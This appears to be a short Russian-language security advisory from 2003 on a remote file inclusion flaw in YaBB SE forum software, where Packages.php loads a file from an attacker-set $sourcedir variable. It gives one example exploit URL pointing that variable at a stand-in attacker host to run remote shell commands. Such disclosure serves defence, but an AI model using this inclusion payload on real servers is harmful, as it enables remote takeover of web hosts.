Выполнение произвольных команд в YaBB SE

Дата публикации:
28.01.2003
Всего просмотров:
1726
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в YaBB SE – популярном форуме для UNIX и Windows систем. Удаленный атакующий может выполнить произвольный код на уязвимом сервере.

Файл 'Packages.php' включает сценарий 'Packer.php', местоположение которого задается переменной '$sourcedir'. Удаленный атакующий может создать URL, в котором переменная '$sourcedir' ссылается на файл, расположенный на удаленном сервере. Если этот файл содержит команды оболочки, то они будут выполнены на уязвимом сервере с привилегиями Web сервера. Пример:

 
http://[target]/yabbse/Sources/Packages.php?sourcedir=http://attacker/
Уязвимость обнаружена в YaBB SE до версии 1.5.0

Ссылки: YabbSE Remote Code Execution Vulnerability ( By Mindwarper :: mindwarper@hush.com :: )
или введите имя

CAPTCHA